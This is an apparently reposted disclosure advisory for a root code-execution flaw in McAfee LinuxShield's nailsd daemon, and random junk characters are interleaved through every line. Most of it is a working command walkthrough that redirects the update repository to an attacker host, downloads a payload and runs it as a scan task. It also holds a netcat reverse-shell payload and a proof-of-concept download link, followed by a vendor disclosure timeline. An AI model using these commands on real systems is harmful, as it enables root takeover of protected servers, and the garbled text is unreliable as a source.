    - }# O' m  Z* A% N$ }. nLinuxShield is an important part of your network security. We( f# B- w) h- ?& @  t
    recommend that you set up an anti-virus security policy for your
    6 L* r  N1 e* y  ~2 _! }- Snetwork, incorporating as many protective measures as possible.; q7 k( y( V  f; T0 C. k3 n7 h
    , T3 d& Q; P7 J1 O* _; L9 ^; w: X
    LinuxShield uses a web-browser interface, and a large number of7 b) t! p  c  Z+ o. s9 m
    LinuxShield installations can be centrally controlled by ePolicy
    . D8 |8 s  t8 x9 }0 v2 X' Y" A9 {9 ?" ROrchestrator.
    ( L7 k. T+ ]5 d6 i$ l  _; p( G$ u7 q5 r  c
    (Product description from LinuxShield Product Guide)
    ' `) S5 r+ O" B6 J- ]* A
    * _  k. W1 C* m) J5 G! L/ ^. S$ A/ Y# m; }

    ( F7 ~9 B7 T6 k& }Description:
    & N) p. l9 y+ o/ r) S============9 w) h) t2 ?$ b

    ! R: n$ B- l8 G2 ^9 HThis vulnerability allows remote attackers to execute arbitrary code
    / a; P; v! Z! S" s  |& jon vulnerable installations of McAfee LinuxShield. User interaction8 T' ]; Y8 ]( w( }- R+ S, k
    is not required to exploit this vulnerability but an attacker must
    5 v( d7 [  @! F) J7 I) i" l  L/ [be authenticated.
    ; s4 F. q3 p, U2 r: z% `
    2 X) m8 }0 n* @1 ]- `% x1 eThe LinuxShield Webinterface communicates with the localy installed8 a- i- M, f2 |% |2 v% p( R0 ]4 |
    "nailsd" daemon, which listens on port 65443/tcp, to do
    5 _0 i9 ]5 H% j6 _7 `$ f0 \5 |6 tconfiguration
    4 ], V! H9 E% M/ Z6 Cchanges, query the configuration and execute tasks.# J* M5 x3 O. s+ }! f

    0 z7 @4 I6 Z/ C% Y- k1 ^, }Each user, which can login to the victim box, can also authenticate5 H/ M3 s# H' P& P" X8 e& e% ?
    it self to the "nailsd" and can do configuration changes and; M: ^8 d) F4 i1 D) f
    execute: C! q/ {* n8 M6 `: k& w, I
    tasks with root privileges.
    0 a' C& W8 U! G3 @
    & T* m; E" ?. r6 V0 u8 b+ m' q+ i) \A direct execution of commands is not possible, but it is possible to
    ' W2 E, x! E' B, P9 w& Mdownload and execute code through manipulation of the config and
    / x  U( [( t, N  Wexecute schedule tasks of the LinuxShield.# I6 e+ y2 I* y6 N$ s, |# Q

    $ L4 V' ^% r1 {% T2 T/ s$ V
    7 |. x9 @' }+ E$ D6 @$ F# Q- pwalk-through (after the TLS handshake):
    6 E9 Z) d7 [/ q1 |# w" a( z+--------------------------------------
    - l' ~) y6 H, E5 \: R- G8 F2 {! ~1 ~+ N
    nailsd > +OK welcome to the NAILS Statistics Service
    , b* Z% ]. l0 T0 ?: Tattacker> auth <user> <pass>: u0 D+ W0 |- c( e% n( B$ q/ @0 \
    nailsd > +OK successful authentication
    7 ]# i, @4 n7 V  o( m- t
    0 v+ i+ y& c/ A) A# Set the Attacker repository to download our code from a httpd
    # M8 Q% t) m6 g4 L# (catalog.z)
    + I% T, A) f! E9 N5 P, s#---------------------------------------------------------------+ d1 s; u. O, X
    attacker> db set 1 _table=repository status=1 siteList=<?xml version
    4 R) c- T6 Z; y4 V="1.0" encoding="UTF-8"?><ns:SiteLists0 m+ d$ X# b, u# a) l- n/ [1 W
    xmlns:ns="naSiteLi7 w3 x; h- ~5 _' D. A& N
    st" GlobalVersion="20030131003110". L  ^# z1 E) ^5 s! c  Y( \  S/ w
    LocalVersion="20091209
    7 p4 [( N) f1 v! Z" a161903" Type="Client"><SiteList0 V& c" D; S) T1 m" h2 Q. \: s
    Default="1" Name="SomeGU
    7 l3 h- f3 Z: ~( u- l2 hID"><HttpSite Type="repository"
    4 K# }4 s% l- X' FName="EvilRepo" Order="13 v* G3 |. c4 U4 r8 `- l
    " Server="<attackerhost>:80"
    / A9 O/ a; n1 c  }) |! F2 o4 \4 @Enabled="1" Local="1"><Rela
    % Q: ]; b! _; w9 Y' `( q3 M+ E6 F& ?; P! B# r
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
    1 ^. T8 H6 w+ O' j; a2 @rName></3 ~  n. i5 `% b4 L  B+ e& L. T
    UserName><Password
    : O4 k8 [6 m# e! qEncrypted="0"/></HttpSite></SiteList></  G; ~# ~4 A' l5 Z# e% {9 v
    ns:SiteLists> _cmd=update
    9 t9 ?7 Q# q  ?6 I0 E+ mnailsd > +OK database changes buffered.. W7 h& r+ Q: r- g# K

    2 u$ P- b" {$ i  B" r# Execute task to set the attacker repository, o! q7 e3 X4 q% w: V) w
    #---------------------------------------------------------------! T8 F( Q: e6 @% u2 y! H4 h" c# ]
    attacker> task setsitelist
    ; R) `. c( _" W4 {7 }% ~nailsd > +OK setting sitelist from CMA.0 M- p) L3 b8 d9 \
    & N/ `8 I4 M& j. o- y( a$ w
    # Execute the default Update task to download the code
    8 I( y+ @. _7 G#---------------------------------------------------------------1 X7 j+ X. V& N* @2 O; h
    attacker> task nstart LinuxShield Update
    , @- p# s& o( ~0 k" Mnailsd > +OK task LinuxShield Update starting
    / X# F0 M. z5 z7 R& Z
    + W7 a$ P3 c  \. e9 n' F+ o# Create a Scan profile, which executes our code. The profiles are
    - L$ ^) d& q# \% t! g. ?; w# not stored in the database.  M, Y* Z8 ^+ Y. J
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg4 C5 I. Y0 V% u* v% R+ D1 }; Y, z
    #---------------------------------------------------------------
    , u; ]4 X6 f5 [) uattacker> sconf ODS_99 begin4 ~, j) U' O3 M6 d' K
    nailsd > +OK 1260400888
    " x$ N0 S& ^" t- q* e/ I1 c: k. ^2 n6 ]3 y8 W
    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the
    8 H- w" b3 L( R! L+ R7 ~; m6 `path
    % ^7 p5 M4 _% _6 e8 W, L+ g# where our earlier downloaded catalog.z file is stored.
    * G* R: v$ ^0 r& B3 @6 }# (/opt/McAfee/cma/scratch/update/catalog.z)
    ; L! k3 S: d6 R3 c#---------------------------------------------------------------
    0 d8 R: {( K3 v7 {) ]( yattacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=0 G' z$ b# d& _( U
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    # V4 I$ g  v4 f8 ^  o) T' `DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    # M% Y2 T8 T* }, q5 X" C( v; f$ [: I10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    ' @! V1 H$ R. U* }; Hine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro5 Z' w0 G9 J0 O+ w
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD) ^) P& [. j7 y6 H) X9 e
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en' k) i) @. W: W8 r, X, }  I
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd! A& t( K! N) E5 Y8 o$ r
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
    7 e% I- _* d* F/ MristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
    / e( F5 f4 P1 V' Re nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    ; m5 @1 M, m* J.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    3 d4 }( l) T# Jle.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    9 x# u( |" b8 r, P. ^dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    ! z; d/ O+ m" _- M' }: s( je nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr) Q/ Z5 [7 C! l- j0 e
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm9 K# k$ e+ b- K( Q
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    5 i8 \. j0 [& T0 e- s- R; t& f.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t/ k5 i% c2 ]$ E' O
    rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    ) d9 U9 @# y  ?6 U% l. x8 N8 fch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100# F; g& a6 G5 @/ r- |
    00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.: G+ T+ Q3 Q0 |% t9 I1 Y; U
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    + d$ o& T$ k3 l, x2 eter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
      c8 T% q+ K0 Q. d: h; Jnailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr' F& O5 l; U2 u( F+ `9 v
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil! H* T' @# U. P1 e" I+ o& A  [2 j4 ^) X
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
    1 x8 [& z. [2 |.action.Default.secondary=Quarantine nailsd.profile.ODS_99.
      g) `# v6 X' W. gaction.App.primary=Clean nailsd.profile.ODS_99.action.App.s" {, _* ^& [) s  r( N9 q( Z! V
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa/ d1 V' [+ n, f7 R5 \* ]
    ss nailsd.profile.ODS_99.action.error=Block
    + D) Z& m- q* n( H  K- Q* {! Anailsd > +OK configuration changes buffered& e6 x& n% ~6 @, ~2 ]9 L
    attacker> sconf ODS_99 commit 1260400888
    $ O: g5 ]( v/ ]& f" Pnailsd > +OK configuration changes stored. i" M+ f  P, X4 @

    , i4 \, R( c! J, x! J& W# Set a scan task with the manipulated profile to execute the code
    ' s1 v# Z- @) z$ o3 }1 h8 _#---------------------------------------------------------------, X, z5 X4 D: E
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy3 M8 c% |7 \0 h) J7 n3 e: [% d% C
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    , s1 b, O2 s* Q/ y5 Hmp;exclude:false timetable=type=unscheduled taskResults=0 i
    8 I: F: |  _/ ]. F( D$ A_lastRun=1260318482 status=Stopped _cmd=insert
    ( s4 m: s- d/ R( z2 f: f5 ]nailsd > +OK database changes buffered; P" N5 f. }& ]

    7 t, ^2 Q! C- l0 q8 z6 o" [6 c# Execute scan task to execute the code
    " {& s6 o8 y, r) {2 i#---------------------------------------------------------------
    % P7 y$ ]* O* O5 G+ uattacker> task nstart Evil Task% s$ U. {1 Z8 N4 Z! B# D  P/ W

    6 q9 b3 E! D, \) ]( A! i& X+-------------------------------------- walk-through EOF
      P8 n; X- c  \, @* m; p1 X6 j6 v0 K: t  A- f& w' M
    ) r4 D5 n' q/ _) k. `! V4 _
    To get a reverse root shell place something like this in the catalog.z4 X: h  R! q1 l) ?' |* T* U
    3 O7 U, O# Q& j; M2 q
    --- snip ---
    ! h9 Q" d. _, f% @2 i+ N#!/bin/sh5 n8 f7 H) ]9 E: b9 f( ?+ h
    nc -nv <attacker_host> 4444 -e /bin/sh4 s1 T2 ]9 I8 _8 x# e  X
    --- /snip ---8 P  j6 s6 a6 B5 t5 U" a! L
    " q2 V; Z% p  H+ R; \7 O# a! r& E

    2 R( o' O  l2 K0 [5 h# N
    & E* u) p4 o9 U$ u  g$ uProof of Concept :
    7 F9 d" X! ^- B7 Z4 \6 Y% }==================, D( ]+ T# g  P8 |

    , b4 c5 f! a* uhttp://inj3ct0r.com/sploits/11165.tar.gz) w" }( A9 z  k! g+ U$ d* V2 A- r

    # E& g& P: m5 n0 b; d4 y
    1 g7 a  Q8 \1 z! Z" h  J9 N. G
    . c! `4 E  i' h( |$ n) X& mSolution:
    8 }4 T$ ]$ s- _  q, w7 L% f( `=========& j5 E6 Q8 N1 k# u( \+ w% c

    8 a# e5 ]. U! g2 b$ [" gMcAfee Advisory
    6 x4 o& ~1 y0 z5 U+--------------
    % P# T$ L# e* t. I. ~https://kc.mcafee.com/corporate/index?page=content&amp;id=SB100079 r6 x# f: d. l1 l

    3 V7 Q4 u2 \) J1 s: p: j, `+ ^$ d! ^" l

    9 L1 K  g) U0 J8 T. q8 H6 Q, LDisclosure Timeline (YYYY/MM/DD):9 {; d) J; f3 ~; q/ E
    =================================" [. |2 \+ I7 i# H" `8 N8 ]  q' @1 J
    1 u" n2 M) e+ k2 W. N9 [
    2009.12.07: Vulnerability found
    1 f0 T: i# O' W* u: V* ?, S2010.02.03: Asked vendor for a PGP key# m1 \3 q) S# c; I# |
    2010.02.05: Vendor sent his PGP key
    / E  t9 \8 \4 l! @, f2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure% K  q8 G' s* {* N
    date (2010.02.18) to Vendor5 f  A( P, g1 H+ k% O9 L
    2010.02.05: Vendor acknowledges the reception of the advisory' B1 p- R  x. N7 b! ]# c' K
    2010.02.16: Ask for a status update, because the planned release date is
    9 M/ l5 w. p2 X$ e& k4 M2010.02.18.
    / r/ i* M' }/ x0 p& r( x5 V/ L4 M2010.02.16: Vendor response that, they are currently working on a patch1 \6 F* P, t2 `2 M
    2010.02.17: Changed release date to 2010.02.25.
      i, q6 s: @& N" ~" f2010.02.22: Vendor gives a status update, that they are able to release; p, M7 f- y5 I) R3 Y
    the patch on 2010.02.25.
    0 x4 ?/ V/ ^% x, ^3 {0 X2010.02.24: Ask for a list of affected products and the advisory url.
    7 B) [/ R- w: B8 f2010.02.24: Vendor sends the list.
    5 R5 k3 b5 |* u8 |5 V9 N* G+ }# s2010.03.02: Release of this Advisory0 T% {! m; u1 d/ R: }  U
    $ z0 n4 U! q) C  F( r' ]/ B( O
    : ~9 K& s; ~8 {9 n( O; I( k

    , w& n) _9 R0 _' S* F7 G8 @$ x2 k$ L* r5 F

    - B  z2 D, K4 J$ d2 G
    4 v2 c5 _$ J% P2 X1 V3 a" T
    - K5 @: e. v% _: n6 Q
    % K$ V. G! W7 C( H
    ! A( A7 r( a+ l
    / e, K% q% M, O: p  t( {$ r5 L! f% ^+ I9 Q. ]
    ! f  r  A8 \/ N# ?& W; a
    4 G7 }0 e) s- j: F0 h, E
    ; x; G4 `5 m* s+ k- i

    1 @3 S. }1 k& X5 D; y' M/ L& X' o0 `' \8 o: p, h. ^
    + S# b2 R8 P) w& d6 y- ?

    % F+ }" J8 r4 T. j3 p$ u3 |
    ' f  p6 R& [' o* j6 {7 E: d- _! n2 [; A  `1 W

    - B4 ]& ]) q. j公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表